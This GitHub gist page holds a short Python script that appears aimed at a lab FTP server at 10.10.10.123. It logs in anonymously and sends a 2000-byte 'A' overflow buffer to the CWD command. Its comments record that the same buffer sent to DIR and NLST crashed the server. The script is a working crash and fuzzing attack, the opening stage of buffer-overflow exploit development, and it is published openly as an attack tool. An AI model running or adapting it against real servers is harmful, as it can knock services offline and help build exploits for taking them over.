Skip to content

Instantly share code, notes, and snippets.

@maliciousgroup

maliciousgroup/ftp_fuzz_script.py Secret

Last active Apr 12, 2021
Embed
What would you like to do?
import ftplib
target_ip: str = "10.10.10.123"
target_port: int = 21
fuzz_buffer: str = 'A' * 2000
ftp = ftplib.FTP(target_ip)
try:
ftp.login()
if ftp.getwelcome():
print(f"[Banner Found]\n{ftp.getwelcome()}\n")
# print(f"[Sending attack to DIR Command]")
# ftp.dir(fuzz_buffer) # causes the application to crash with 'ORDINAL NOT FOUND' exception, no overwrites
# print(f"[Sending attack to NLST Command]")
# output = ftp.nlst(fuzz_buffer) # causes the application to crash with 'ORDINAL NOT FOUND' exception, no overwrites
# print(output)
print(f"[Sending attack to CWD Command]")
output = ftp.cwd(fuzz_buffer)
print(output)
except ftplib.error_perm as e:
if "command not understood" in e.__str__():
print(f"[server does not support CWD command]")
finally:
ftp.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment